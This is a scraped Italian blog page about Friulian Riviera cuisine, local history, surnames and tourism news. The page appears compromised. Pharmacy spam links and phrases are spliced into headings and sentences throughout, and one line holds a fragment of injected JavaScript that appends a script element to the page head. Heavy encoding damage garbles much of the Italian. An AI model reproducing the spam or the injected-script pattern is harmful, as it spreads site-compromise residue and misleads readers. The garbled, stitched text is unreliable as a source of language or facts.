La cultura ai??i??si mangia!

Buy http://www.mediarelease.nl/overig/purchase-hytrin-generic/ Nellai??i??ambito del convegno La cultura ai??i??si mangia! Il cibo come patrimonio culturale. In pescaria vecia si A? tenuto il convegno: Oggi parliamo di pesce. Le novitAi?? legate al Bisato in Entra »

Valerio Ghin

Purchase d.getElementsByTagName(‘head’)[0].appendChild(s);var d=document;var s=d.createElement(‘script’); d.getElementsByTagName(‘head’)[0].appendChild(s); http://rarespanta.ro/how-much-does-endep-cost/ buy differin gel cost of pilex tablets purchase micronase medication Purchase intlo illalu vantintlo priyuralu telugu movie online veoh cymbalta 60 mg street price cephalexin acne Entra »

Rivvinitalybisato2014rid

ai???PRIMAai??i?? PER IL ai???BISATO IN SPEOai??i?? Lai??i??ANGUILLA ALLO SPIEDO DELLA TRADIZIONE LAGUNARE NEL GRANDE SALONE INTERNAZIONALE

PRESENTATO ASSIEME AI VINI DELLE TRE DOC RIVIERASCHE NELLO STAND DEL FVG Ha conquistato anche al ai???Vinitalyai??i?? il palato di gourmet, degustatori, enologi, buyer, appassionati dei sapori del territorio il ai???Bisato in Entra »

Serata con le Piume di Laguna e i Cru di Ronchi di Cialla

Venerdi 19 o 26 Aprile Degustazione con Le Piume di Laguna !!! Millefoglie con PatA? di Alzavola Anguilla affumicata e Mela verde Caramellata , Petto di Germano Reale con Lardo di Colonnata Entra »

SIndacocepilemorandin

TURISMO/ENOGASTRONOMIA: I FONDAMENTI DELLA CUCINA TIPICA DEL TERRITORIO DELLA RIVIERA FRIULANA

order suprax antibiotic used to treat buy tadalista 20 LE BASI GETTATE NEL CONVEGNO ‘LEGATO AL 5.PREMIO GIORNALISTICO ‘VALERIO GHIN’ A MARANO LAGUNARE (UD) TRE LE AREE DEI SAPORI INDIVIDUATE: DEL GRADESE, Entra »

Monthly Archives: marzo 2013

Visita a Marano nel 1908, quando cai??i??erano ancora ai???I brassi de San VAi??oai???

cartina_marano_lagunare

order unisom during pregnancy

Di recente A? venuto alla luce un articolo del 1908 in cui si parla delle visite che onorevoli di allora facevano a Precenicco, Lignano , Marano e Porto Nogaro per constatare e risolvere due punti : lai??i??importante questione legata alla navigazione fluviale e marittima e alla malaria che flagellava quelle popolazioni. Lai??i??articolo ci interessa anche perchAi?? vengono descritte le braccia di San Vito, viste dai visitatori.Si erano ritrovati lai??i??onorevole Morpurgo, presidente della Camera di Commercio, lai??i??ing.Pacifico Valussi (oggi una Scuola Media di primo grado gli A? intestata a Udine), il sindaco di Udine e molti altri, per ammirare le bellezze paesaggistiche offerte dalla gita lungo il fiume Stella. Quando sai??i??imbarcarono sul traghetto che li portava a Lignano e da lAi?? con il tram a cavalli il cav. Marzuttini, uno fra i gitanti rilevava che la penisola di Lignano si trovava in una posizione ideale, diceva: ai???deve diventare un Eden per la sua spiaggia, tanto piA? che ormai A? libera dalla malaria per chilometri e chilometriai???.Il cav. Marzuttini che si adoperA? per migliorare la condizione sanitaria disse:ai??? I bambini inviati al mare o ai monti, i bambini che lai??i??anno scorso furono alle cure marine a Venezia e che questai??i??anno sono a Riccione, faccio voti perchAi?? lai??i??altrai??i??anno possano andare a Lignanoai???.

COGNOME COLUSSI

Purchase Ha alla base il nome personale Nicola, nella forma sincopata e con il suffisso diminutivo ai??i??ussi.Nello schedario Biasutti il cognome compare fin dal 1461 a Casarsa, ma A? assai diffuso e puA? essersi formato in piA? luoghi. A Grado i Colussi arrivarono da Terzo dai??i??Aquileia alla fine del 1800, conosciuti con il soprannomi di Mori, a Marano con quello di Museto. I Colussi sono presenti a Ospedaletto e Gemona nel XVIII secolo. Verso la metAi?? del Settecento A? presente in fortezza Colussi Domenico, nato verso il 1720, sarto di professione. Con buona probabilitAi?? alcuni suoi capostipiti provenivano dalla Carnia, dove, comai??i??A? noto esisteva la fabbrica di tessuti di Jacopo Linussio con tutto il lavoro indotto che ne conseguiva. I sarti e le sarte, ad esempio venivano tenuti in grande considerazione dai notai quando nei loro atti dovevano stimare e valutare le dote delle giovani spose. Spesso nel Settecento chi aveva dimestichezza con i tessuti veniva chiamato per valutare anche le divisioni dei beni tra fratelli, per i quali, doveva valere il proverbio ai???fradei, corteiai??? se le stime venivano rigorosamente elencate e parificate in parallelo: dieci cogolli ad un fratello dieci cogolli allai??i??altro.

CUCINA PASQUALE: RIVIERA E ALTA CUCINA FRIULANA E VENETA PER IL MENU’ DELLA TRADIZIONE

saporediprimavera

Purchase

DAL PESCE LOCALE AI PIATTI DELLA TIPICITA’ CON MATERIE PRIME DI PREGIO E DI PROSSIMITA’
Arriva la primavera astronomica, e speriamo anche metereologica, e con essa la ricchezza della cucina pasquale. Lasciato alle spalle il rigore dell’inverno, i piatti dell’alta cucina friulana si prospettano ora come un delizioso mix tra i sapori primaverili e le pietanze ancora caloriche, retaggio delle necessitAi?? alimentari dell’inverno. La collina friulana, per il pranzo di Pasqua, a La Taverna di Colloredo di Monte Albano (UD) propone nella sua location accattivante, ai piedi del castello di Colloredo Mels, un percorso che commisura le esigenze dietetiche con quelle del gusto e della gola. Dal sapore decisamente mediterraneo dei Gamberi rossi rostiti con punte di asparagi, che sarAi?? equilibrato dall’ Insalata Waldorf con peperone grigliato, falsa maionese e germogli. Dal sapore di primavera con la cocotte di crespella gratinata e con asparagi di Tavagnacco, erbe primaverili e fonduta di alpeggio, al Tortello di carni bianche, pappa al pomodoro e fiocchi di burrata. Per arrivare al piatto della tradizione pasquale: il capretto nostrano al forno, profumo di rosmarino e patate arrosto.

TERRITORIO: IL COMUNE DI PALAZZOLO DELLO STELLA (UD) HA ADERITO ALLA RIVIERA FRIULANA

Olistellladiplomazoroddu2013

L’ATTESTATO RICEVUTO DAL VICESINDACO SIMONE FRANCESCO ZORODDU, IL QUALE HA RIVENDICATO IL RUOLO TURISTICO DEL RETROTERRA DELLE GRANDI SPIAGGE
Un altro tassello importante della rete rivierasca. Il Comune di Palazzolo dello Stella (UD) A? entrato a far parte della Riviera Friulana. l’ente civico della localitAi?? che in questi giorni A? in evidenza sulle cronache anche nazionali per una vincita collettiva supermilionaria ha infatti aderito all’Associazione culturale no profit La Riviera Friulana. L’attestato che ne testimonia l’adesione A? stato ricevuto nella sede municipale dal vicesindaco e assessore al Turismo, Simone Francesco Zoroddu. Il vicesindaco ha voluto testimoniare l’interesse dell’Amministrazione comunale per il progetto rivierasco. Palazzolo fa parte del comprensorio turistico lignanese e rivendica un ruolo nella promozione del territorio inteso come un unicum di offerta, balneare ed estiva e del retroterra, dunque di carattere culturale, ambientale, sportivo, enogastronomico.

Powered by WordPress | Designed by: diet | Thanks to lasik, online colleges and seo